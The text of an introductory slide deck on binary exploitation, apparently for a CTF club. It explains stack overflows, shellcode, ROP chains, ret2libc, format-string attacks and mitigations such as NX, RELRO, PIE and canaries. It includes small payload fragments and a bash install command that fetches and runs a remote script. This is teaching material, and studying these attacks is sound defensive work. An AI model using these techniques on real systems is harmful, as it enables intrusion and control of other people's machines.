1 of 79

Intro to Binary Exploitation

(pwn)

2 of 79

The Stack

3 of 79

Stack Basics

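The stack is for automatic memory allocation (local variables, saved registers, return addresses)

grows down (toward lower addresses)

The heap is for dynamic memory allocation

grows up (toward higher addresses)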

4 of 79

Call Stack Basics

This is generally how the call stack works on an x86 computer
Figure: call stack layout after the DrawSquare subroutine (shown in blue) called DrawLine (shown in green), which is the currently executing routine. The figure is drawn for an upward-growing stack; on x86 the stack actually grows downward.

5 of 79

Buffer Overflow

(bof)

6 of 79

7 of 79

Buffer Overflow

a buffer is just a region of memory you put stuff in
a buffer is overflowed when you write past the end of the buffer
commonly a result of improper handling of user input
programming errors can allow the user to input more than there is space for

8 of 79

… why not just use strings?

for example, why not (Python) user_input = input('enter a string: ') ?
strings are actually more complicated than they seem
a lot of work is being done under the hood to allocate a buffer of the appropriate size and keep track of it
a low-level language like C does not do this for you

9 of 79

ok so what?

what happens if we overflow a buffer on the stack?
what important things are on the stack?
let's run (break) some sample code

10 of 79

ok so what?

11 of 79

how did that happen?

When we input data that is longer than the memory allocated for the buffer, it can overwrite important stuff, e.g.:

other variables on the stack
the base pointer
the return address

NOTE: If we can overwrite the return address, we can control which function we return to when we finish with the current one

usually we return to whichever function called it

12 of 79

we can do more!

so, we just saw that we can overwrite local variables
this is already pretty dangerous, since we can edit variables we're not supposed to be able to touch
what else is on the stack?

13 of 79

ok so what?

Payload

Random bytes until we get to what we want to overwrite
B\x11@\x00\x00\x00\x00\x00

address of "interesting_function" packed as a 64-bit int (for a 64-bit program)
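The payload above can be reproduced in a few lines. This is a minimal sketch: the 40-byte padding is an assumption for illustration (the real distance depends on the program), and 0x401142 is simply the address that the bytes shown above decode to.

```python
import struct

# Assumed for illustration: distance from the start of the buffer
# to the saved return address. Find the real value in a debugger.
OFFSET = 40

# Address of interesting_function, decoded from the bytes shown above.
TARGET = 0x401142

# "<Q" packs an unsigned 64-bit integer in little-endian byte order,
# which is how x86-64 stores addresses in memory.
packed = struct.pack("<Q", TARGET)

# Filler bytes up to the return address, then the new return address.
payload = b"A" * OFFSET + packed

print(packed)  # b'B\x11@\x00\x00\x00\x00\x00'
```

The filler bytes can be anything; only their count matters.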

14 of 79

making pwn easier - pwntools

pwntools

framework for quickly making exploits
has tonsssss of features for pwn

documentation:

https://docs.pwntools.com/

tutorials:

https://github.com/Gallopsled/pwntools-tutorial#readme

python3 -m pip install pwntools

15 of 79

pwntools basics

This is how we can exploit the previous program

This is most of the functionality you will need from pwntools for most exploits
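A rough sketch of what such an exploit script can look like (not necessarily the code from the original slide). The path "./vuln", the offset, and the target address are placeholders; `process`, `sendline`, and `interactive` are the pwntools calls used.

```python
import struct

def build_payload(offset: int, target: int) -> bytes:
    """Padding up to the return address, then the new 64-bit address."""
    # struct.pack("<Q", x) produces the same bytes as pwntools' p64(x).
    return b"A" * offset + struct.pack("<Q", target)

def exploit(path: str, offset: int, target: int) -> None:
    # Imported here so the payload helper works without pwntools installed.
    from pwn import process

    io = process(path)                          # start the target program
    io.sendline(build_payload(offset, target))  # send payload plus newline
    io.interactive()                            # hand the terminal to us

# Hypothetical usage: exploit("./vuln", 40, 0x401142)
```

For a remote challenge, pwntools' `remote(host, port)` can take the place of `process(path)`; the rest stays the same.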

16 of 79

making pwn easier - gef

GDB plugin
Provides really useful features specifically for binary reversing and exploitation

https://github.com/hugsy/gef

INSTALL: bash -c "$(wget https://gef.blah.cat/sh -O -)"

there are alternatives to GEF, but GEF is better bc it's easier

17 of 79

gdb/gef basics - where do I set my breakpoint?

18 of 79

gdb/gef basics - where do I set my breakpoint?

19 of 79

gdb/gef basics - how do I find the offset?

The offset is 0x7fffffffdfb8 - 0x7fffffffdf90 = 0x28 = 40 bytes

we need it to know how much data to input before we reach the saved return address
if we can overwrite the return address, we control the instruction pointer (rip), and with it what the program does
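A quick check of that subtraction, using the two addresses from the debugger session:

```python
# Addresses read from the debugger session described above.
return_address_slot = 0x7fffffffdfb8  # where the saved return address lives
buffer_start = 0x7fffffffdf90         # where our input begins

offset = return_address_slot - buffer_start
print(hex(offset), offset)  # 0x28 40
```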

20 of 79

gdb/gef basics - how do I find the offset?

This is the stack

Notice our input is at offset 0x0 and the return address is at offset 0x28

offset is still 0x28

21 of 79

buffer overflow on the stack is powerful

we can change variable values
we can redirect program execution
we can (almost) run any code we want

on 32-bit x86, control of the stack means we can call any function with any arguments

some interesting things to note:

not only can we jump to functions, but we can also jump to the middle of functions
you can jump to any instruction you want (assuming proper register setup)
you can even jump to the middle of instructions on x86 and amd64

remember, instructions are just a bunch of bits

22 of 79

buffer overflow can also mean reading data

23 of 79

Shellcode

sally sells seashells by the sea shore sally sells seashells by the sea shore sally sells seashells by the

24 of 79

executable stack???

The stack is writable bc we need to put stuff on there while running
Sometimes it is (but shouldn't be) executable too though!

maybe we can write code (assembly) onto the stack and execute it!!

25 of 79

writing (and understanding) shellcode

What do I need?

clean up registers

some registers need to be clear before running functions

this is according to the calling conventions

populate registers

if you want to run "/bin/sh", you need to find that string somewhere

set up your stack
make a syscall

26 of 79

example shellcode for running /bin/sh
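As an illustration (not necessarily the shellcode from the original slide), here is a commonly shared 27-byte x86-64 Linux sample, annotated instruction by instruction. The Python around it only inspects the bytes; it does not run them.

```python
import struct

# Widely circulated x86-64 Linux execve("/bin/sh") shellcode,
# split per instruction. Treat it as an illustrative sample.
SHELLCODE = bytes.fromhex(
    "31c0"                  # xor eax, eax   ; clear rax
    "48bbd19d9691d08c97ff"  # mov rbx, imm64 ; negated "/bin/sh\0"
    "48f7db"                # neg rbx        ; rbx = "/bin/sh\0"
    "53"                    # push rbx       ; string is now on the stack
    "54"                    # push rsp
    "5f"                    # pop rdi        ; rdi -> "/bin/sh"
    "99"                    # cdq            ; rdx = 0 (envp = NULL)
    "52"                    # push rdx       ; NULL terminator for argv
    "57"                    # push rdi       ; argv[0]
    "54"                    # push rsp
    "5e"                    # pop rsi        ; rsi -> argv
    "b03b"                  # mov al, 59     ; execve syscall number
    "0f05"                  # syscall
)

# The string is stored negated so the encoded bytes contain no 0x00.
imm = struct.unpack("<Q", SHELLCODE[4:12])[0]
binsh = struct.pack("<Q", (-imm) % 2**64)

print(len(SHELLCODE), binsh, b"\x00" in SHELLCODE)
```

This covers the checklist: registers are cleared, the "/bin/sh" string is built on the stack, rdi/rsi/rdx are populated, and a syscall is made.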

27 of 79

calling execve - explained

28 of 79

example shellcode stack

29 of 79

luckily - we can steal shellcode!

http://shell-storm.org/shellcode/index.html

30 of 79

how to exploit?

locate where the shellcode will execute from
write the shellcode to that location and execute it

sometimes pwntools has good shellcode premade

31 of 79

what if I don't know where my shellcode will execute?

nops!

nop = no-op = no operation
0x90 is the machine-code byte for the "nop" instruction on x86

we can fill the stack with a bunch of nops and then have the shellcode afterwards

this is called a "nop sled"

that way, if we land anywhere inside the sled, a bunch of empty code gets executed and execution slides into the real code
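A minimal sketch of building a nop sled. The helper name `with_nop_sled` and the one-byte placeholder "shellcode" are made up for illustration.

```python
NOP = b"\x90"  # x86 single-byte no-op

def with_nop_sled(shellcode: bytes, total_len: int) -> bytes:
    """Left-pad shellcode with NOPs so the result is total_len bytes long."""
    if len(shellcode) > total_len:
        raise ValueError("shellcode does not fit in the requested length")
    return NOP * (total_len - len(shellcode)) + shellcode

# Placeholder "shellcode": a single int3 (0xcc) breakpoint instruction.
sled = with_nop_sled(b"\xcc", 64)
```

The longer the sled, the less precisely the overwritten return address has to be guessed.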

32 of 79

33 of 79

sometimes shellcode is a little more complicated

this is something you figure out over time with practice

34 of 79

pro tips

you often cannot have any null bytes (0x00) in your shellcode: if the input is copied with string functions (e.g. strcpy), a null byte terminates the string and cuts off your shellcode

- mov ebx, 0

this instruction contains nulls (the 32-bit immediate 0 is encoded as four 0x00 bytes)

- xor ebx, ebx

this instruction doesn't but does the same thing

- mov eax, 1

this instruction contains nulls because the immediate 1 is encoded as a full 32-bit value (01 00 00 00)

- mov al, 1

this instruction doesn't because al is the lower 8 bits of the eax register, so the immediate is a single byte (it leaves the upper bits of eax unchanged, so clear eax first)

You can write C code and disassemble it to see what assembly is used to do what you want. Clean it up, extract the assembly, and write your shellcode
You can always steal shellcode, debug it, and modify it
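The null-byte claims can be checked against the machine code. The byte strings below are one common encoding of each instruction (an assembler may pick an equivalent alternative).

```python
# Machine-code encodings (x86, 32-bit operand size) of the instructions above.
ENCODINGS = {
    "mov ebx, 0":   bytes.fromhex("bb00000000"),
    "xor ebx, ebx": bytes.fromhex("31db"),
    "mov eax, 1":   bytes.fromhex("b801000000"),
    "mov al, 1":    bytes.fromhex("b001"),
}

def has_null(code: bytes) -> bool:
    """True if the encoded instruction contains a 0x00 byte."""
    return b"\x00" in code

for asm, code in ENCODINGS.items():
    print(f"{asm:14} {code.hex():12} null bytes: {has_null(code)}")
```

The same `has_null` check is worth running on a finished payload before sending it.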

35 of 79

ROP Gadgets

Rop Rop Rop - Rop to the Top

36 of 79

37 of 79

Basic Buffer Overflow is limited

we looked at buffer overflows and what you can do with them

overwrite locals
return to functions

we are missing some things though…
our examples were a bit contrived

are we really going to have an "interesting_function" irl?

we want to be able to run anything!

38 of 79

interesting_function is rare

there will almost never be a function that just does everything you want
a developer is not going to leave an unused function that gives you a shell for free
a bit like taping your house key to the front door

39 of 79

can't we just return to assembly?

this attack used to work, but nowadays it does not

most memory now has proper permissions (stack shouldn't be executable)

remember memory maps?

40 of 79

memory is never write + execute

gef➤ vmmap

[ Legend: Code | Heap | Stack ]

Start End Offset Perm Path

0x0000555555554000 0x0000555555555000 0x0000000000000000 r-- /my-program

0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /my-program

0x0000555555556000 0x0000555555557000 0x0000000000002000 r-- /my-program

0x0000555555557000 0x0000555555558000 0x0000000000002000 r-- /my-program

0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /my-program

0x0000555555559000 0x000055555557a000 0x0000000000000000 rw- [heap]

0x00007ffff7dbc000 0x00007ffff7dde000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7dde000 0x00007ffff7f56000 0x0000000000022000 r-x /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7f56000 0x00007ffff7fa4000 0x000000000019a000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7fa4000 0x00007ffff7fa8000 0x00000000001e7000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7fa8000 0x00007ffff7faa000 0x00000000001eb000 rw- /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7faa000 0x00007ffff7fb0000 0x0000000000000000 rw-

0x00007ffff7fca000 0x00007ffff7fce000 0x0000000000000000 r-- [vvar]

0x00007ffff7fce000 0x00007ffff7fcf000 0x0000000000000000 r-x [vdso]

0x00007ffff7fcf000 0x00007ffff7fd0000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7fd0000 0x00007ffff7ff3000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7ff3000 0x00007ffff7ffb000 0x0000000000024000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7ffc000 0x00007ffff7ffd000 0x000000000002c000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002d000 rw- /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-

0x00007ffffffdd000 0x00007ffffffff000 0x0000000000000000 rw- [stack]

Binary

Shared Libraries

Dynamic Loader

41 of 79

DEP means no jumping to shellcode

Data Execution Prevention (DEP) or Write XOR Execute (W ^ X)
with DEP enabled, no memory region is simultaneously writable and executable (unless the program explicitly asks for one)
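One way to check this on a real process is to scan the memory map for regions that are both writable and executable. A small sketch, assuming the column layout of the vmmap output shown earlier; the function name is made up.

```python
def writable_and_executable(vmmap_text: str) -> list:
    """Return the lines of a vmmap listing whose permissions include w and x."""
    flagged = []
    for line in vmmap_text.splitlines():
        fields = line.split()
        # Expected columns: start, end, offset, perms, [path]
        if len(fields) < 4 or not fields[0].startswith("0x"):
            continue
        perms = fields[3]
        if "w" in perms and "x" in perms:
            flagged.append(line)
    return flagged

sample = """\
0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /my-program
0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /my-program
0x00007ffffffdd000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
"""
print(writable_and_executable(sample))  # []
```

An empty result means there is nowhere to both write and run shellcode; an `rwx` stack line would show up in the list.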

https://twitter.com/gf_256/status/1376947885569413121

42 of 79

do we need new instructions?

we can't make new functionality, but we can make use of existing functionality
we already saw that we can call functions, but controlling registers would be helpful (especially on 64-bit where function arguments are in registers)
if we look through the code sections, we can find some useful sequences of instructions that end in ret
each one of these is called a gadget
we can chain gadgets together to do useful things
this is called Return Oriented Programming (ROP)

43 of 79

Useful Info - The GOT & PLT

When we compile a program, we usually reuse code from a library of C functions (libc)

We "dynamically link" the library to our program so whenever the program runs, it can refer to the libc on someone's computer instead of having to include all the functions in the program
this saves space

The GOT - Global Offset Table

A section inside the program that holds addresses of functions that are dynamically linked
Unless the binary is marked as Full RELRO (more on this later), these functions are only resolved to an address once called

The PLT - Procedure Linkage Table

Before function addresses have been resolved, the GOT points to an entry in the PLT
This allows for calling the dynamic linker with the name of the function that should be resolved

44 of 79

$ ROPgadget --binary prog

Gadgets information

============================================================

0x00000000004010bd : add ah, dh ; nop ; endbr64 ; ret

0x00000000004010eb : add bh, bh ; loopne 0x401155 ; nop ; ret

...

0x000000000040124c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

0x000000000040124e : pop r13 ; pop r14 ; pop r15 ; ret

0x0000000000401250 : pop r14 ; pop r15 ; ret

0x0000000000401252 : pop r15 ; ret

0x000000000040124b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

0x000000000040124f : pop rbp ; pop r14 ; pop r15 ; ret

0x000000000040115d : pop rbp ; ret

0x0000000000401253 : pop rdi ; ret

0x0000000000401251 : pop rsi ; pop r15 ; ret

0x000000000040124d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

0x000000000040101a : ret

...

45 of 79

quick example…

I want to call function(42, 1337)

rdi = 42, rsi = 1337, return to function

can use these two gadgets:
0x401253 : pop rdi ; ret
0x401251 : pop rsi ; pop r15 ; ret
notice all gadgets have to end with the "ret" instruction
follow the stack pointer and what instructions we are executing

…AAAAAAAA
0x401253
42
0x401251
1337
(don't care)
function
…
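The stack layout above can be built like this. The gadget addresses come from the ROPgadget listing; the address of `function` and the 40-byte padding are hypothetical placeholders.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (like pwntools' p64)."""
    return struct.pack("<Q", value)

POP_RDI = 0x401253       # pop rdi ; ret
POP_RSI_R15 = 0x401251   # pop rsi ; pop r15 ; ret
FUNCTION = 0x401156      # hypothetical address of function()
PADDING = 40             # hypothetical offset to the return address

chain = [
    POP_RDI, 42,            # rdi = 42
    POP_RSI_R15, 1337, 0,   # rsi = 1337, r15 = don't care
    FUNCTION,               # finally "return" into function(42, 1337)
]
payload = b"A" * PADDING + b"".join(p64(word) for word in chain)
```

Each `ret` pops the next address in the list, so the chain executes top to bottom.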

46 of 79

how do I exploit this?

47 of 79

short aside on stack alignment

some instructions (particularly movaps) crash the program if the memory operand is not 16-byte aligned

library functions on some systems, especially Ubuntu, tend to use this instruction for speed

the stack is usually 16-byte aligned when a function is called, but this might not be true when doing ROP
if your ROP chain has an odd number of addresses/numbers before returning to a function that uses movaps, the function won't work properly :(
solution: insert a ret gadget before returning to this function to pad your ROP chain to an even number of things
this is a bit advanced so talk to me if you don't understand
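A sketch of that padding rule. It assumes the chain starts at the overwritten return address, every entry is 8 bytes, the last entry is the address of the function being called, and the count includes that last entry. The helper name is made up; 0x40101a is the bare `ret` gadget from the ROPgadget listing.

```python
RET = 0x40101a  # the bare "ret" gadget from the ROPgadget listing

def align_chain(chain: list, ret_gadget: int = RET) -> list:
    """Insert a ret before the final function address if the chain
    (counting that address) has an odd number of 8-byte entries."""
    if len(chain) % 2 == 1:
        return chain[:-1] + [ret_gadget, chain[-1]]
    return list(chain)

# Returning straight to a function is a one-entry chain, so it gets padded.
print([hex(w) for w in align_chain([0x401156])])
```

If a chain still crashes on movaps, adding or removing one `ret` is a quick thing to try.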

48 of 79

49 of 79

Return to libc

(ret2libc)

50 of 79

51 of 79

We are almost there!

with buffer overflow, we can overwrite locals and call functions
with ROP gadgets, we can control function arguments too
now… where do we go?

52 of 79

Where are the library functions?

functions like printf and fgets are very common
they exist in a shared library instead of the binary itself

this is unless the program is statically linked

when the program starts, the shared library is mapped into memory so the binary can use it

53 of 79

Why can't we just call system?

system("/bin/sh") would give us a shell very easily
system is in libc, so can we just call it?
no! Address Space Layout Randomization (ASLR) prevents this by loading shared libraries at random addresses

54 of 79

How can we use the PLT & GOT?

the GOT is like an array of function pointers to the libc functions that the binary needs
when the binary needs to call a library function, it calls the PLT instead
each GOT entry initially points to a resolver routine, and is then overwritten to the real function address for subsequent calls

55 of 79

How can we do it?

randomization is not per-function
the entire libc is loaded as a block at a random address
if we can leak a libc address, then we can calculate the base address of libc and also the address of anything in libc

basically, if we know where one libc function is, we know where all of them are
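The arithmetic is just one subtraction and one addition. All numbers below are made up for illustration; real offsets come from the exact libc build the target uses.

```python
# Hypothetical numbers for illustration only.
PUTS_OFFSET = 0x84420     # offset of puts inside the libc file (assumed)
SYSTEM_OFFSET = 0x52290   # offset of system inside the libc file (assumed)

leaked_puts = 0x7ffff7e40420  # runtime address of puts (assumed leak)

libc_base = leaked_puts - PUTS_OFFSET
system_addr = libc_base + SYSTEM_OFFSET

# A sane base is page-aligned: its low 12 bits are zero.
assert libc_base & 0xfff == 0
print(hex(libc_base), hex(system_addr))
```

If the computed base is not page-aligned, the libc version or the leak is probably wrong.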

56 of 79

Two-step attack plan:

the first ROP chain should leak a libc address, then return back to main so we can attack the program again
with the address of libc known, the second ROP chain can simply call system("/bin/sh") (the "/bin/sh" string exists in libc as well)

57 of 79

Step 1: libc leak

if the program prints anything, then printing functions will be in the PLT so we can call them without a libc leak
the argument can be any address containing a libc address
we can leak a libc address from the GOT since we know where it is
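A sketch of the leak stage, assuming `puts` is the printing function available in the PLT. All addresses passed in are placeholders that would come from the target binary.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (like pwntools' p64)."""
    return struct.pack("<Q", value)

def leak_chain(pop_rdi: int, puts_got: int, puts_plt: int, main: int) -> bytes:
    """ROP chain for puts(puts@got), then return to main for round two."""
    return b"".join(p64(w) for w in (pop_rdi, puts_got, puts_plt, main))

def parse_leak(line: bytes) -> int:
    """Turn the raw bytes printed by puts into an integer address."""
    raw = line.rstrip(b"\n")
    # puts stops at the first 0x00, so the two zero top bytes are missing.
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]

# Hypothetical addresses and a hypothetical leaked line.
chain = leak_chain(0x401253, 0x404018, 0x401030, 0x401196)
print(hex(parse_leak(b"\x20\x04\xe4\xf7\xff\x7f\n")))
```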

58 of 79

Step 2: returning into libc

find the address of system and "/bin/sh" in libc
return to system("/bin/sh")
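A sketch of the second stage. The offsets of `system` and "/bin/sh" are placeholders that depend on the libc build; the extra `ret` is there for stack alignment.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (like pwntools' p64)."""
    return struct.pack("<Q", value)

def system_chain(libc_base: int, pop_rdi: int, ret: int,
                 system_off: int, binsh_off: int) -> bytes:
    """ROP chain for system("/bin/sh") once the libc base is known."""
    words = (
        pop_rdi, libc_base + binsh_off,  # rdi -> "/bin/sh" inside libc
        ret,                             # extra ret for stack alignment
        libc_base + system_off,          # call system
    )
    return b"".join(p64(w) for w in words)

# Hypothetical values throughout.
chain = system_chain(0x7ffff7dbc000, 0x401253, 0x40101a, 0x52290, 0x1b45bd)
```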

59 of 79

Example Ret2Libc

Find libc and load binaries
Find the address of puts & "/bin/sh" in the binary
Find the address of puts in libc
Calculate the offset between the 2 puts addresses (leaked at runtime vs. in the libc file); this is the libc base address
Use the offset to find system() and call it with the "/bin/sh" string

60 of 79

Format Strings

(printf)

61 of 79

printf primer

int printf(const char *format, ...);
first argument is NOT the "string to print"
first argument is a format string controlling what printf does
related functions fprintf, dprintf, sprintf, snprintf do similar things

Hi my name is adam

100 64

0x55d2cd15a2a0 adam
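The output lines above look like the result of format strings along these lines. This is a guess, since the original code is not in the text. Python's `%` operator borrows printf's specifiers, so it can stand in for the C calls; it has no `%p`, so the pointer line is left out.

```python
name = "adam"

# %s inserts a string, %d a decimal integer, %x the same integer in hex.
line1 = "Hi my name is %s" % name
line2 = "%d %x" % (100, 100)

print(line1)  # Hi my name is adam
print(line2)  # 100 64
```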

62 of 79

63 of 79

man 3 printf

64 of 79

User-controlled format string

what if we (attackers) control the format string?
what can we do with printf(user_input)?
we can put in format specifiers that change what printf does!

65 of 79

Stack Leaking

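how does printf know how many arguments it needs to print?
it doesn't: it trusts the format string and reads as many arguments as the specifiers ask for
recall that arguments are on the stack

on 64-bit, the first six arguments are in registers, but further arguments are on the stack

the positional form %N$ (e.g. %7$p prints the 7th argument as a pointer) will be very helpful
what happens if we do printf("%42$p")?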
main returns to __libc_start_main, so that return address can be leaked to get a libc leak
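A small sketch for probing argument positions and reading the reply. The helper names are made up, and which position holds the interesting return address depends on the target, so in practice a range is tried.

```python
def probe(first: int, last: int) -> bytes:
    """Format string asking printf for arguments first..last as pointers."""
    return ".".join(f"%{i}$p" for i in range(first, last + 1)).encode()

def parse_pointers(output: bytes) -> list:
    """Parse printf's reply; glibc prints a NULL pointer as "(nil)"."""
    values = []
    for token in output.decode().strip().split("."):
        values.append(0 if token == "(nil)" else int(token, 16))
    return values

print(probe(6, 8))  # b'%6$p.%7$p.%8$p'
```

Values that start with 0x7f are usually libc or stack addresses and are good leak candidates.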

66 of 79

Memory Writing

the special %n specifier writes the number of bytes printed so far
the corresponding argument is a pointer to where that count gets stored
for normal programs, it's only useful in niche situations
for attackers, it is very powerful

we won't cover specifics today though

we can already write through any pointer that is on the stack

67 of 79

How to get the pointer?

we can write to any pointer on the stack
how do we get that pointer in the first place?
if there's an input buffer on the stack, then we can just put a pointer there
otherwise we need to be more creative

68 of 79

What to overwrite?

a good choice is the GOT
remember that calls to library functions go through the PLT, which jumps to function pointers in the GOT
if we overwrite a GOT entry with some address, then calls to the corresponding function will instead jump to that address

69 of 79

Be creative!

format string vulnerabilities can be tricky
input buffer not on stack
limited buffer size (so limited format string size)
only one call to printf
etc…

70 of 79

how do we exploit?

71 of 79

Binary Security

checksec

72 of 79

pwntools has a tool called checksec which can check security on a binary

73 of 79

NX (remember this?)

NX - No-eXecute
Changes the permissions on the stack so it is no longer executable

Memory should be writable or executable but not both

When NX is enabled, we cannot run shellcode from the stack

this is enabled with 1 (one) bit in the binary
Use ROP instead

74 of 79

RELRO (remember this?)

RELRO - Relocation Read-Only

Security Measure that makes some sections of the binary read-only

Partial RELRO (the default with GCC on many systems)

This doesn't really do much to prevent an attack.
Forces the GOT to come before a section of memory called the BSS

This prevents buffer overflows on a global variable from overwriting the GOT

We rarely use Global Variables

Full RELRO

Makes the entire GOT read-only, meaning you can't overwrite addresses in the GOT

This can make a lot of ROP much harder

75 of 79

PIE

PIE - Position Independent Executable

Every time you load the binary, it gets loaded at a different memory address
This means we can't use static addresses like we did in the example

need to leak an address and then use it as an offset to do our exploits

We can leak addresses with format string vulnerabilities, buffer overflows…

76 of 79

Stack Canaries (Stack Cookies)

This is the idea that we can place a small random value (the "canary") on the stack between a buffer and the saved return address
When we overflow, we overwrite everything between the buffer and the return address, including the canary
Thus, if the "canary" has changed when the function is about to return, we know someone tried a buffer overflow and the program aborts

You can bypass by leaking the canary and rewriting it onto the stack
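A sketch of a payload that puts a leaked canary back in place. The layout (buffer, canary, saved base pointer, return address) is the usual one on x86-64 but is an assumption here, and all values are placeholders.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (like pwntools' p64)."""
    return struct.pack("<Q", value)

def payload_with_canary(buf_len: int, canary: int, ret_addr: int) -> bytes:
    """Overflow that rewrites the canary with its own (leaked) value."""
    return (
        b"A" * buf_len     # fill the buffer up to the canary
        + p64(canary)      # put the leaked canary back unchanged
        + b"B" * 8         # saved base pointer (value not important here)
        + p64(ret_addr)    # new return address
    )

# Hypothetical leaked canary and target address.
payload = payload_with_canary(24, 0x1122334455667700, 0x401142)
```

On Linux the lowest byte of the canary is 0x00, which is why the example value ends in 00.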

77 of 79

Final Thoughts

78 of 79

Final Thoughts

Binary exploitation is a complicated topic and needs a good amount of practice before it can be done easily
There are also plenty more exploitation techniques (e.g. heap and kernel exploitation) and more advanced offshoots of what we discussed.

Practice!

79 of 79

Resources

LiveOverflow's Pwn YouTube Series
My Collection of Pwn Challenges and Writeups
My CTF Cheat Sheet and Resource List
Nightmare

made by the guy who was at the gbm last week